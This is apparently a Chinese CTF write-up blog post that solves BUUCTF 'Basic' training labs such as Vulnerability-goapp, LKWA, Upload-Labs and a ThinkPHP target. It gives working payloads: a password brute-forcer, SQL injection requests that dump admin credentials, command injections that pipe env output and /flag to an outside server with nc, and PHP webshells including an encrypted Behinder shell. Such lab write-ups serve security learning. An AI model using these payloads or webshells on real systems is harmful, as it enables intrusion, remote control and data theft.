BUUCTF笔记之Basic部分WP

最新推荐文章于 2024-05-28 09:52:02 发布
最新推荐文章于 2024-05-28 09:52:02 发布
阅读量4.8k 收藏 13
点赞数 1
分类专栏: CTF web安全 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuaicenglou3032/article/details/117572162
版权

声明:此文仅供学习记录研究使用,切勿用于非法用途,否则后果自负!

1.Linux Labs

这题就是熟悉一下ssh了。

登录找到flag.txt:

2.Java Sec Code

这题有点无语,感觉更像是宣传Java Sec Code这个项目。

拿flag:http://057bfb68-fe8f-4ecb-ad38-ad35f029e01b.node3.buuoj.cn/rce/exec?cmd=env

题外话,对于学习java漏洞来说,这个github项目确实是很好的,我们不能仅仅局限于拿flag刷分数,更多的是要深入研究代码背后的思想。

就像项目作者说的,很多研发编写的Java代码是有漏洞的,与其有时间全世界做漏洞挖掘,不如仔细学习分析一下通常漏洞是怎么写的。本项目作者是在阿里做攻防的同学,他的主要贡献是故意写一个全是漏洞的应用,以便大家可以代码审计分析一个正常写法和漏洞写法是什么样子。

3.Juice Shop

这题也很不错啊,github说的:OWASP Juice Shop is probably the most modern and sophisticated insecure web application! It can be used in security trainings, awareness demos, CTFs and as a guinea pig for security tools! Juice Shop encompasses vulnerabilities from the entire OWASP Top Ten along with many other security flaws found in real-world applications!

牛批!

进去:

查看源代码看下:


<!--
  ~ Copyright (c) 2014-2020 Bjoern Kimminich.
  ~ SPDX-License-Identifier: MIT
  -->

<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>OWASP Juice Shop</title>
  <meta name="description" content="Probably the most modern and sophisticated insecure web application">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link id="favicon" rel="icon" type="image/x-icon" href="assets/public/favicon_js.ico">
  <link rel="stylesheet" type="text/css" href="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.css" />
  <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
  <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script>
    window.addEventListener("load", function(){
      window.cookieconsent.initialise({
        "palette": {
          "popup": { "background": "#546e7a", "text": "#ffffff" },
          "button": { "background": "#558b2f", "text": "#ffffff" }
        },
        "theme": "classic",
        "position": "bottom-right",
        "content": { "message": "This website uses fruit cookies to ensure you get the juiciest tracking experience.", "dismiss": "Me want it!", "link": "But me wait!", "href": "https://www.youtube.com/watch?v=9PnbKL3wuH4" }
      })});
  </script>
<link rel="stylesheet" href="styles.css"></head>
<body class="mat-app-background bluegrey-lightgreen-theme">
  <app-root></app-root>
<script src="runtime-es2018.js" type="module"></script><script src="runtime-es5.js" nomodule defer></script><script src="polyfills-es5.js" nomodule defer></script><script src="polyfills-es2018.js" type="module"></script><script src="vendor-es2018.js" type="module"></script><script src="vendor-es5.js" nomodule defer></script><script src="main-es2018.js" type="module"></script><script src="main-es5.js" nomodule defer></script></body>
</html>

无果。遂百度,发现说查看网页源码发现页面#/score-board。怪事了

先访问下吧:

有了。闯关作答模式,对于提升web渗透综合能力非常有帮助。

第一关 Find the carefully hidden 'Score Board' page.

You successfully solved a challenge: Score Board (Find the carefully hidden 'Score Board' page.)

但实际上网页源代码并没有这一提示啊,我日

第二关 Give a devastating zero-star feedback to the store.

给商店一个毁灭级的0星反馈

4.NSB_Login

确认用户名admin存在,查看源码发现提示:

把kali的rockyou导出来,用burp爆破:

133兆1400万行,估计要爆破好一会了。:

额,burp崩掉了,算了,还是上代码:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
import requests

url = "http://17740528-4330-4259-b509-34a053f9ce62.node3.buuoj.cn/login.php"
HX = "密码错误"

dir = open('C:\\Users\\root\\Desktop\\rockyou.txt')
line = dir.readline()
i = 0
while line:
    line = line.strip('\n')
    d = {'email': 'admin', 'password': line, 'remember_me': 0}
    r = requests.post(url, data=d)
    print line.decode('unicode_escape')
    if len(r.text) != 51:
        print '找到密码:'+str(i)+'\n'+r.text.decode('unicode_escape')
        break
    line = dir.readline()
    i+=1
dir.close()

爆破出密码及flag:

注:这道题有点诡异,爆不出密码,但是根据回显就能拿到flag。

5.bwAPP

拿flag:http://54808425-f223-4ed1-abcd-1a7e96ebb001.node3.buuoj.cn/phpi.php?message=phpinfo();

6.Vulnerability-goapp

随便注册一个账户:

经过测试发现TimeLine下有sql注入:

POST /timeline/searchpost HTTP/1.1
Host: 889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: http://889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn
Connection: keep-alive
Referer: http://889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn/timeline
Cookie: UserName=tom; SessionID=MUAxLmNvbQ==; UserID=4; adminSID=
Upgrade-Insecure-Requests: 1

post=%22+union+select+(SELECT+group_concat(table_name)+from+information_schema.tables+where+table_schema="vulnapp")%2C1%3B

这里爆字段名,准备把管理员账号密码注出来登上去看看:

爆管理员邮箱(admin@admin.com和amuro@ray.com)

POST /timeline/searchpost HTTP/1.1
Host: 889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Origin: http://889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn
Connection: keep-alive
Referer: http://889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn/timeline
Cookie: UserName=tom; SessionID=MUAxLmNvbQ==; UserID=4; adminSID=
Upgrade-Insecure-Requests: 1

post=%22+union+select+(SELECT+group_concat(mail)+from+vulnapp.admins)%2C1%3B

爆密码:

登陆上去看看:

一无所获,百度一下:

Go语言代码安全审计分享

得到adminusers这个url下存在任意命令执行问题:

在pkg/admin/admin.go的52行发现命令注入,直观可以看出取出cookie的内容拼接命令语句执行。我们来审计一下:

package admin

import (
	"database/sql"
	"fmt"
	"html/template"
	"log"
	"math/rand"
	"net/http"
	"os/exec"
	"strings"
	"time"

	"golang.org/x/xerrors"

	"github.com/hardw01f/Vulnerability-goapp/pkg/cookie"
)

type Lists struct {
	Uid       string
	UserName  string
	UserLists []string
}

func GetRandString() string {
	rand.Seed(time.Now().UnixNano())
	var letterRunes = []rune("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ")

	b := make([]rune, 32)
	for i := range b {
		b[i] = letterRunes[rand.Intn(len(letterRunes))]
	}
	return string(b)
}

func StoreAdminSID(adminSessionID string) {
	db, err := sql.Open("mysql", "root:rootwolf@tcp(mysql)/vulnapp")
	if err != nil {
		log.Fatal(err)
	}
	defer db.Close()

	_, err = db.Exec("insert into adminsessions(adminsessionid) values(?)", adminSessionID)
	if err != nil {
		fmt.Printf("%+v\n", err)
	}

}

func GetAdminSid(adminSessionCookie string) (results string, err error) {
	commandLine := "mysql -h mysql -u root -prootwolf -e 'select adminsid from vulnapp.adminsessions where adminsessionid=\"" + adminSessionCookie + "\";'"

	res, err := exec.Command("sh", "-c", commandLine).Output()
	if err != nil {
		fmt.Println(err)
	}

	results = string(res)

	if results != "" {
		return results, nil
	}

	err = xerrors.New("recode was not set")

	return "", err
}

func ShowAdminLogIn(w http.ResponseWriter, r *http.Request) {
	if r.Method == "GET" {
		if cookie.CheckSessionID(r) {
			t, _ := template.ParseFiles("./views/admin/adminlogin.gtpl")
			t.Execute(w, nil)
		} else {
			http.Redirect(w, r, "/login", 302)
		}
	} else {
		http.NotFound(w, nil)
	}
}

func Confirm(w http.ResponseWriter, r *http.Request) {
	if r.Method == "POST" {
		requestMail := r.FormValue("adminmail")
		requestPasswd := r.FormValue("adminpasswd")

		fmt.Println(requestMail, ":", requestPasswd)

		cmd := "mysql -h mysql -u root -prootwolf -e 'select adminid from vulnapp.admins where mail=\"" + requestMail + "\" and passwd=\"" + requestPasswd + "\";'"

		fmt.Println(cmd)

		res, err := exec.Command("sh", "-c", cmd).Output()
		if err != nil {
			fmt.Println("err : ", err)
		}

		if string(res) == "" {
			fmt.Println("not")
			t, _ := template.ParseFiles("./views/admin/failedauthentication.gtpl")
			t.Execute(w, nil)
			return
		}

		fmt.Println(string(res))
		fmt.Println("success")

		adminSessionID := GetRandString()
		fmt.Println(adminSessionID)

		adminSID := &http.Cookie{
			Name:  "adminSID",
			Value: adminSessionID,
		}
		http.SetCookie(w, adminSID)

		StoreAdminSID(adminSessionID)

		t, _ := template.ParseFiles("./views/admin/successauthentication.gtpl")
		t.Execute(w, nil)

	} else {
		http.NotFound(w, nil)
	}
}

func ShowAdminPage(w http.ResponseWriter, r *http.Request) {
	if r.Method == "GET" {
		adminSID, err := r.Cookie("adminSID")
		if err != nil {
			fmt.Printf("%+v\n", err)
		}
		fmt.Println(adminSID.Value)

		adminUid, err := GetAdminSid(adminSID.Value)
		if err != nil {
			fmt.Println("not authentication")
			t, _ := template.ParseFiles("./views/admin/failedauthentication.gtpl")
			t.Execute(w, nil)
			return
		}

		fmt.Println(adminUid)

		uid, err := r.Cookie("UserID")
		if err != nil {
			fmt.Println(err)
		}
		fmt.Println(uid)

		userName, err := r.Cookie("UserName")
		if err != nil {
			fmt.Println(err)
		}
		fmt.Println(userName.Value)

		cmd := "mysql -h mysql -u root -prootwolf -e 'select id,name,mail,age,created_at,updated_at from vulnapp.user where name not in (\"" + userName.Value + "\");'"

		fmt.Println(cmd)

		res, err := exec.Command("sh", "-c", cmd).Output()
		if err != nil {
			fmt.Println("err : ", err)
		}

		splitedRes := strings.Split(string(res), "\n")
		fmt.Println(splitedRes)

		p := Lists{Uid: uid.Value, UserName: userName.Value, UserLists: splitedRes}

		fmt.Println(p)

		t, _ := template.ParseFiles("./views/admin/userlists.gtpl")
		t.Execute(w, p)

	} else {
		http.NotFound(w, nil)
	}
}

重点看GetAdminSid方法:

func GetAdminSid(adminSessionCookie string) (results string, err error) {
	commandLine := "mysql -h mysql -u root -prootwolf -e 'select adminsid from vulnapp.adminsessions where adminsessionid=\"" + adminSessionCookie + "\";'"

	res, err := exec.Command("sh", "-c", commandLine).Output()
	if err != nil {
		fmt.Println(err)
	}

	results = string(res)

	if results != "" {
		return results, nil
	}

	err = xerrors.New("recode was not set")

	return "", err
}

看看adminSessionCookie从哪里来:

买一台服务器使用nc命令复现一下(服务器地址:116.85.64.251):

GET /adminusers HTTP/1.1
Host: 889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn/adminconfirm
Cookie: UserName=tom; SessionID=MUAxLmNvbQ==; UserID=4;adminSID=ciXSnSZDcwIhJgmtYPSBSVZEIpclEUPF'|echo `env`|nc 116.85.64.251 1234|echo '
Upgrade-Insecure-Requests: 1

然后在116.85.64.251上监听1234端口,成功拿到flag。:

题外话:这道题本身其实是考验go语言代码审计的能力,拿flag其实不是最重要的。

7.LKWA

题外话:我们依然是要以代码审计,提高自己的审计能力为主,拿flag并不是最终的目的。

Lesser Known Web Attack Lab is for intermediate pentester that can test and practice lesser known web attacks such as Object Injection, XSSI, PHAR Deserialization, variables variable ..etc. Write-ups are welcome. My own walk-through is here .

该项目当前存在的漏洞:

  • Blind RCE
  • XSSI
  • PHAR Deserialization
  • PHP Object Injection
  • PHP Object Injection via Cookies
  • PHP Object Injection (Object Reference)
  • SSRF
  • Variables variable

看到这里我就有谱了,blind RCE,大杀器啊!

虽然没有回显,但是无所谓的,一样干。

先echo env发现没有flag,盲猜根目录下有flag:

买一台服务器,监听1234端口:nc -lvvp 1234

然后命令执行:echo `cat /flag`|nc 116.85.25.7 1234|echo 

服务器那边就当真监听到了flag:

8.Webug 4.0

admin/admin登录之后:

选择文件上传。

payload:

POST /control/upload_file/upload_file_1.php HTTP/1.1
Host: afab4711-bc37-4bc6-b0c5-4878eaa53034.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------38371522652734190106744779495
Content-Length: 396
Origin: http://afab4711-bc37-4bc6-b0c5-4878eaa53034.node3.buuoj.cn
Connection: keep-alive
Referer: http://afab4711-bc37-4bc6-b0c5-4878eaa53034.node3.buuoj.cn/control/upload_file/upload_file_1.php
Cookie: PHPSESSID=n92qahrtf87daufabjviq65261
Upgrade-Insecure-Requests: 1

-----------------------------38371522652734190106744779495
Content-Disposition: form-data; name="file"; filename="2.phtml"
Content-Type: image/png

GIF89a>>>><script language='php'>eval($_GET['shell']);</script>
-----------------------------38371522652734190106744779495
Content-Disposition: form-data; name="submit"

ä¸ä¼ 
-----------------------------38371522652734190106744779495--

拿flag:

http://afab4711-bc37-4bc6-b0c5-4878eaa53034.node3.buuoj.cn/template/upload/2.phtml?shell=phpinfo();

9.PikaChu

10.[Windows]Upload-Labs-Windows

第一关,上传冰蝎马:

POST /Pass-01/index.php HTTP/1.1
Host: 76a7821b-187a-4035-b40e-3a61f273afce.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------131545444913111702653512167775
Content-Length: 825
Origin: http://76a7821b-187a-4035-b40e-3a61f273afce.node3.buuoj.cn
Connection: keep-alive
Referer: http://76a7821b-187a-4035-b40e-3a61f273afce.node3.buuoj.cn/Pass-01/index.php
Upgrade-Insecure-Requests: 1

-----------------------------131545444913111702653512167775
Content-Disposition: form-data; name="upload_file"; filename="3.php"
Content-Type: image/png

<?php 
@error_reporting(0);
session_start();
$key="e45e329feb5d925b";
$_SESSION["k"]=$key;
$post=file_get_contents("php://input");
if(!extension_loaded("openssl")){
	$t="base64_"."decode";
	$post=$t($post."");
	for($i=0;$i<strlen($post);$i++) {$post[$i] = $post[$i]^$key[$i+1&15]; }}else{$post=openssl_decrypt($post, "AES128", $key);}$arr=explode("|",$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p) {eval($p."");}}@call_user_func(new C(),$params);?>
-----------------------------131545444913111702653512167775
Content-Disposition: form-data; name="submit"

ä¸ä¼ 
-----------------------------131545444913111702653512167775--

连冰蝎马:

发现文件Fl@g_glzjin_still_w@nts_a_girl_friend.txt

flag就在里面

11.LFI Labs

12.AWD-Test1

http://4bad8dd0-53ec-4f0d-a435-c29dd8e0f144.node4.buuoj.cn:81/index.phpindex.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cat%20/flag

一键get flag。

KogRow
关注
  • 1
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
BUUCTF——Basic题解
Zichel77的博客
08-17 5609
所以我们不能将input设为具体的值,而是在序列化执行,令input=&correct。文件包含在 php 中,涉及到的危险函数有四个,分别是 include()、include_once()、require()、require_once()。程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程一般被称为文件包含。于是涉及到了md5绕过的问题,md5这个地方可以用md5弱碰撞,因为是弱类型比较。以下几个的md5弱类型比较均相等。...
BUUCTF——Basic
计算机硕士的博客
06-16 1657
BUUCTF——Basic(详细版),包括了做题思路和详细步骤。Linux Labs、BUU LFI COURSE 1、BUU BRUTE 1、BUU SQL COURSE 1。
探索与学习:Vulnerability-goapp,一款专为教育设计的Go语言漏洞示范应用
最新发布
gitblog_00052的博客
05-28 315
探索与学习:Vulnerability-goapp,一款专为教育设计的Go语言漏洞示范应用 项目地址:https://gitcode.com/Snow-HardWolf/Vulnerability-goapp 在网络安全日益重要的今天,理解并防御潜在的威胁成为了每一个开发者的必修课。今天,让我们一同揭开【Vulnerability-goapp】的神秘面纱,这是一款特别为教育培训和研究目的打造的易受...
NSB_Login
weixin_46601305的博客
02-10 298
BUUCTF 靶场 NSB_Login
【网络安全CTFBUUCTF(Basic篇)
信安是不可或缺的一部分!
05-11 6262
参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171。admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
BUUCTF-Basic
5L2g556F5ZWl77yf
11-08 2786
文章目录BasicLinux LabsBUU LFI COURSE 1Upload-Labs-LinuxBUU CODE REVIEW 1BUU BRUTE 1BUU SQL COURSE 1sqli-labsBUU UPLOAD COURSE 1BUU BURP COURSE 1BUU XSS COURSE 1 Basic Linux Labs ssh连接/目录下 BUU LFI COURSE 1 <?php /** * Created by PhpStorm. * User: jinzhao
我的ctf刷题wp笔记
03-25
我的ctf刷题wp笔记
Java笔记高级部分20190819.pdf
10-25
java学习笔记,高级,面试大全
HCIA部分笔记.one
04-11
HCIA部分笔记.one
计算机科学导论部分笔记
12-25
计算机科学导论部分笔记
浅浅笔记oop面向对象编程部分
05-29
浅浅笔记oop面向对象编程部分
[buuctf.reverse] 070_[羊城杯 2020]login
weixin_52640415的博客
05-11 531
z3求解,数组 ; python生成的exe文件解包,还原头部
re学习笔记(57)BUUCTF-re-[FlareOn4]login
逆向随笔
04-02 1519
新手一枚,如有错误(不足)请指正,谢谢!! 题目链接:BUUCTF-re-[FlareOn4]login 下载下来是个html文件,F12查看源代码 大概意思就是匹配字符大小写字母,将前十三位与后十三位对换 写脚本 #include <stdio.h> char data[37] = "PyvragFvqrYbtvafNerRnfl@syner-ba.pbz"; int main(...
buuctf Basic
自强不息
02-16 750
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
BUUCTF-Basic部分(4道)
weixin_45908624的博客
05-24 1714
buuctf
BUUCTFBasic 解析(一)
Flag少侠的博客
04-28 870
Linux Labs、BUU LFI COURSE 1、BUU BRUTE 1、BUU SQL COURSE 1
BUUCTF初学解题记录——Basic
u010152530的博客
05-04 5825
目录Linux LabBUU LFI COURSE 1Upload-Labs-LinuxBUU CODE REVIEW 1BUU BRUTE 1未完待续。。。 Linux Lab # 地址和端口为示例,需要更改为动态分配后的地址和端口 ssh root@node233.buuoj.cn -p 233 # 输入默认密码123456 cat /flag.txt # 输出flag: # flag{ef2a6029-xxxx-xxxx-xxxx-86fb808b12f2} # 一开始以为只要大括号的内容就行了。。。
BUUCTF--练习场-- basic--上传文件漏洞经典靶场upload-labs-- Pass1-3(Pass4简单尝试)
qq_51550750的博客
01-29 2838
文件上传功能非常常见,上传图片、视频,论坛发送带上附件,邮件发送带上附件等场景 BUUCTF–练习场-- basic–上传文件漏洞经典靶场upload-labs Pass-1 先尝试上传一张正常的照片: 上传成功: 右键,查看图像,得到上传成功的地址: http://07b2a810-8fe2-406b-b1d0-6bce30a755ae.node4.buuoj.cn:81/upload/Chrysanthemum.jpg 然后尝试上传木马: 根据简介中提到的: upload-labs是一
Go代码审计学习(一)
paidx0
12-12 1658
Go代码审计学习(一)
"嵌入式系统设计师考试笔记之操作系统基础与重要性
嵌入式系统设计师考试笔记之操作系统基础涉及了嵌入式系统设计中的系统设计、硬件设计和软件设计等方面。其中,大部分工作集中在嵌入式软件方面,包括操作系统的移植、系统体系架构设计、设备驱动程序编写以及用户...
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值